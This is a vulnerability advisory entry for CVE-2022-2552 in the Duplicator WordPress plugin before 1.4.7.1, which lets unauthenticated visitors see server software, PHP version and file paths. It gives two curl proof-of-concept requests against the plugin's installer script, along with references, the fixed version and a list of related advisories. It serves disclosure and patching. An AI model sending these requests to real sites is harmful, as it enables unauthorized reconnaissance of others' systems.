Duplicator < 1.4.7.1 – Unauthenticated System Information Disclosure | CVE 2022-2552 | Plugin Vulnerabilities

Description

The plugin does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.

Proof of Concept

1. curl 'http://example.com/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1'
2. curl -d view 'http://example.com/wp-content/backups-dup-lite/dup-installer/main.installer.php?debug=1'

Affects Plugins

Fixed in 1.4.7.1

References

CVE

URL

https://packetstormsecurity.com/files/#167895/

URL

https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Ihsan Sencan

Submitter

Ihsan Sencan

Submitter website

https://www.securitrust.fr

Verified

Yes

WPVDB ID

6b540712-fda5-4be6-ae4b-bd30a9d9d698

Timeline

Publicly Published

2022-08-01 (about 1 years ago)

Added

2022-08-01 (about 1 years ago)

Last Updated

2023-05-03 (about 1 years ago)

Other

Published

Title

Published

2024-04-07

Title

Slideshow Gallery <= 1.7.9 - Unauthenticated Sensitive Information Exposure

Published

2024-04-22

Title

Newsletters < 4.9.6 - Information Exposure via Log files

Published

2024-04-02

Title

WooCommerce Customers Manager < 29.8 - Subscriber+ Email Disclosure

Published

2023-12-13

Title

Debug Log Manager < 2.3.0 - Sensitive Logs Exposure

Published

2023-09-21

Title

DoLogin Security < 3.7.1 - Subscriber+ IP Address leak